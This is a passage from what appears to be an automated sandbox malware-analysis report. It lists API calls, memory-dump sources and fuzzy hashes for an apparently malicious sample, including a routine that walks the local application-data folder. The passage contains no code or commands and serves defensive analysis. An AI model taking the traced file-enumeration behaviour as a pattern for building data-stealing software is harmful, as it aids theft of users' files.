                              • CreateFileA.KERNEL32(001D3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001D3AEE,?), ref: 001D92FC
                              • GetFileSizeEx.KERNEL32(000000FF,001D3AEE), ref: 001D9319
                              • CloseHandle.KERNEL32(000000FF), ref: 001D9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                              • Instruction ID: d896ed4538183d2f3407ad12337edd67110cb4240434a819546fcd7ee07bf6dd
                              • Opcode Fuzzy Hash: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                              • Instruction Fuzzy Hash: BEF03779E40308BBDB14DBB0DD49B9E77B9BB48720F11C664BA51A72C0D670AA118B45
                              APIs
                              • __getptd.LIBCMT ref: 001DC74E
                                • Part of subcall function 001DBF9F: __amsg_exit.LIBCMT ref: 001DBFAF
                              • __getptd.LIBCMT ref: 001DC765
                              • __amsg_exit.LIBCMT ref: 001DC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 001DC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                              • Instruction ID: 4dc162f7a3ba3a4bd18b9887dda62db0abd55765581348c6399eda4a01361676
                              • Opcode Fuzzy Hash: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                              • Instruction Fuzzy Hash: 41F0B432D09702DBDB21BBB8988774F33A06F10721F22494BF406AB3D2DB645941DED6
                              APIs
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001D4F7A
                              • lstrcat.KERNEL32(?,001E1070), ref: 001D4F97
                              • lstrcat.KERNEL32(?,014A9268), ref: 001D4FAB
                              • lstrcat.KERNEL32(?,001E1074), ref: 001D4FBD
                                • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                                • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                                • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                                • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                                • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                              • Instruction ID: 1fdca972dad2863ce0813c80bd8ba4c9b7a84d70b17c8001a18f272f1f79a641
                              • Opcode Fuzzy Hash: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                              • Instruction Fuzzy Hash: 6B21987690030867C754FBB0DD56EED333CABA9300F004569B699A3181EF74DAD98B96